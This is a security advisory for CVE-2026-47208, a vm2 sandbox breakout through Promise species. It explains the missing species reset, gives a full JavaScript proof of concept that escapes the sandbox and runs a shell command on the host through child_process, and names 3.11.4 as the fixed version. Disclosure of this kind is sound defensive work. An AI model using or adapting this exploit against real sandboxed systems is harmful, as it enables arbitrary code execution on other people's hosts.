CVE-2026-47208
vm2 is Vulnerable to Sandbox Breakout Through Promise Species
Description
### Summary VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. ### Details The `localPromise` constructor was changed to call `this.then(undefined, eater)` to ensure a rejected promise is always used. However, this is missing a call to `resetPromiseSpecies` to ensure that `this` has no special species. Since the species can be changed a custom promise can be used to supply a custom reject method to the executor allowing to get a raw host error and escape the sandbox. ### PoC ```js const {VM} = require("vm2"); const vm = new VM(); vm.run(` class E extends Error {} function so(d) { if (d > 0) so(d-1); const e = new E(); e.stack; throw e; } let ex, ct; class FakePromise extends Promise { static get [Symbol.species](){return ct;} } function doCatch(f) { ex=undefined; const p=Promise.withResolvers(); ct = function(e){e(f, v=>{ex=v;p.resolve();})}; new FakePromise(r=>r()); return p.promise; } (async function f(s) { let min = s; let max = 100000; while (min<max) { const mid = (min+max)>>1; await doCatch(()=>so(mid)); if (ex.name==="RangeError" && !(ex instanceof RangeError)) { ex.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); return; } if (ex instanceof E) { min = mid+1; } else { max = mid; } } f(s+1); })(0); `); ``` ### Impact Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.
How to fix CVE-2026-47208
To remediate CVE-2026-47208, upgrade the affected package to a fixed version below.
- —upgrade to 3.11.4 or later
Is CVE-2026-47208 being exploited?
No exploitation signal available. Neither CISA KEV nor a current EPSS score has been published for CVE-2026-47208.